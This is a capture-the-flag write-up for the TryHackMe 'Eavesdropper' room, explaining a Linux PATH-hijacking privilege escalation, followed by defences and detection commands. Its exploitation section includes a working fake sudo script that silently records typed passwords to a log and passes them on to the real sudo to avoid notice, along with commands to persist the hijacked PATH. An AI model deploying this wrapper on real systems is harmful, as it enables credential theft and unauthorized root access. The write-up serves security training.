PATH Hijacking Privilege Escalation — THM “Eavesdropper” Room

Overview

This writeup details a PATH Hijacking attack used to escalate privileges from a low-privileged user (frank) to root in the TryHackMe "Eavesdropper" room. The attack exploits the order in which Linux searches for executables to intercept sensitive credentials.

Attack Scenario

• Initial Access: Obtained SSH access via compromised private key for user frank
• Objective: Escalate to root to retrieve the flag in /root/
• Challenge: User frank has limited privileges and no obvious sudo rights
• Key Insight: The room name “Eavesdropper” hints at credential interception through network or system monitoring

Step-by-Step Exploitation

1. Initial Reconnaissance

bash

# Check current privileges
id
# uid=1000(frank) gid=1000(frank) groups=1000(frank)

# Check sudo capabilities
sudo -l
# User frank may not run sudo on this host# Examine PATH variable
echo $PATH
# /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

2. Discovery Phase

Using pspy64 (process monitoring tool), we observed:

• Periodic execution of sudo cat /etc/shadow by another user/process
• This indicated that sudo password prompts were occurring regularly

3. PATH Hijacking Theory

Linux executes commands by searching directories in $PATH from left to right. By inserting a malicious executable early in this path, we can intercept commands before they reach the legitimate binaries.

4. Exploit Implementation

Step 1: Identify Writable Directory

bash

# Check for writable directories in PATH
for dir in $(echo $PATH | tr ':' ' '); do 
    if [ -w "$dir" ]; then 
        echo "Writable: $dir"
    fi
done

If no writable directories exist in the default PATH:

bash

# Create a malicious directory
mkdir -p /tmp/malicious_bin

# Add it to the beginning of PATH
export PATH="/tmp/malicious_bin:$PATH"# Make it persistent for current session
echo 'export PATH="/tmp/malicious_bin:$PATH"' >> ~/.bashrc
source ~/.bashrc

Step 2: Create Malicious Sudo Wrapper

bash

cat > /tmp/malicious_bin/sudo << 'EOF'
#!/bin/bash
# Display fake sudo prompt
echo -n "[sudo] password for $USER: "

# Read password silently (no echo)
read -s password
echo# Save captured credentials
echo "==================================" >> /tmp/creds.log
echo "Timestamp: $(date)" >> /tmp/creds.log
echo "User: $USER" >> /tmp/creds.log
echo "Password: $password" >> /tmp/creds.log
echo "Command: $@" >> /tmp/creds.log
echo "==================================" >> /tmp/creds.log# Forward to legitimate sudo with captured password
echo "$password" | /usr/bin/sudo -S "$@"
EOF# Make executable
chmod +x /tmp/malicious_bin/sudo

Step 3: Wait for Trigger

The attack relies on another user or process executing sudo. In this room, we observed via pspy64 that sudo cat /etc/shadow was executed periodically, likely by a cron job or another user.

5. Credential Capture

When the legitimate sudo command was executed:

1. System searched $PATH for sudo executable
2. Found our malicious /tmp/malicious_bin/sudo first
3. Malicious script displayed identical sudo prompt
4. User/system entered password thinking it was legitimate sudo
5. Password was saved to /tmp/creds.log
6. Script forwarded password to real sudo to avoid detection

6. Privilege Escalation

bash

# Check captured credentials
cat /tmp/creds.log

# Use captured root password
su root
# Enter captured password# Alternative method
echo "captured_password" | sudo -S bash

7. Flag Retrieval

bash

# Once root access is obtained
cat /root/flag.txt
# OR
cat /root/root.txt

Technical Details: How PATH Hijacking Works

PATH Environment Variable

bash

# Example PATH
/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin

• Linux searches these directories left to right
• First matching executable is executed
• Our attack places malicious binary in /tmp/malicious_bin (beginning of PATH)

Why This Works

1. No Absolute Paths: Users often run commands without full paths (sudo vs /usr/bin/sudo)
2. Trust in Environment: System assumes PATH hasn’t been maliciously modified
3. Visual Indistinguishability: Fake prompt identical to legitimate one

Defensive Measures

1. Use Absolute Paths

bash

# Always use full paths for privileged commands
/usr/bin/sudo command
/usr/bin/cat /etc/shadow

2. Secure PATH Variable

bash

# Set secure PATH in system profiles
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Avoid adding user-writable directories
# Never include . (current directory) in PATH

3. File Integrity Monitoring

bash

# Monitor critical binaries
sudo apt install aide
sudo aide --init
sudo mv /var/lib/aide/aide.db.new /var/lib/aide/aide.db

4. Least Privilege Principle

• Regular users shouldn’t have write access to system binary directories
• Use chattr +i to make critical binaries immutable

5. Sudo Configuration

bash

# Configure secure defaults in /etc/sudoers
Defaults env_reset
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

Detection Indicators

1. Unusual PATH modifications:
2. bash

• echo $PATH | grep -E “(tmp|dev|shm|\.)”

1. Suspicious files in temporary directories:
2. bash

• find /tmp /dev/shm -name “sudo” -type f 2>/dev/null

1. Unexpected credential files:
2. bash

• find / -name “*creds*” -o -name “*password*” -type f 2>/dev/null | grep -v /proc

Conclusion

This attack demonstrates how environment variable manipulation can lead to complete system compromise. The “Eavesdropper” room effectively illustrates that privilege escalation often requires:

1. Observation (monitoring with pspy64)
2. Understanding system mechanics (PATH variable behavior)
3. Strategic positioning (placing malicious binary in search path)
4. Patience (waiting for triggering event)

Key Takeaway: Always use absolute paths for privileged operations and regularly audit system $PATH configurations in security-critical environments.